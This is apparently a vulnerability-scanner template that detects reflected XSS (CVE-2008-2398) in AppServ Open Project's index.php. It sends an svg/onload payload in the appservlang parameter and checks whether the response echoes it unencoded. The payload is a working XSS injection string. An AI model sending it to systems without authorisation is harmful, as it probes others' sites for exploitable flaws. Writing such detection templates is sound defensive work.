---
# Detection template for CVE-2008-2398: reflected XSS through the
# `appservlang` query parameter of index.php in AppServ Open Project
# 2.5.10 and earlier.
id: CVE-2008-2398

info:
  name: AppServ Open Project 2.5.10 and earlier XSS
  author: unstabl3
  severity: medium
  description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
  reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
  tags: cve,cve2008,xss

requests:
  - method: GET
    path:
      # A single probe: the marker is sent URL-encoded in `appservlang`.
      - '{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    # All three matchers below must hold before a finding is reported.
    matchers-condition: and
    matchers:
      # The page was served normally rather than as an error or redirect.
      - type: status
        status:
          - 200

      # The marker comes back decoded and byte-for-byte in the body, i.e.
      # the parameter value was echoed without HTML output encoding. An
      # encoded echo (&lt;svg ...) does not match.
      - type: word
        part: body
        words:
          - "<svg/onload=confirm('xss')>"

      # The response headers declare text/html. This presumably filters out
      # echoes in plain-text or JSON responses, which a browser would not
      # render as markup.
      - type: word
        part: header
        words:
          - 'text/html'